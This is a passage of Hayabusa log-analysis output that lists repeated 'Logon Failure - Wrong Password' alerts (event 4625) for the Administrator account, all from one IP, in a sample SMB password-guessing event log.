NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: 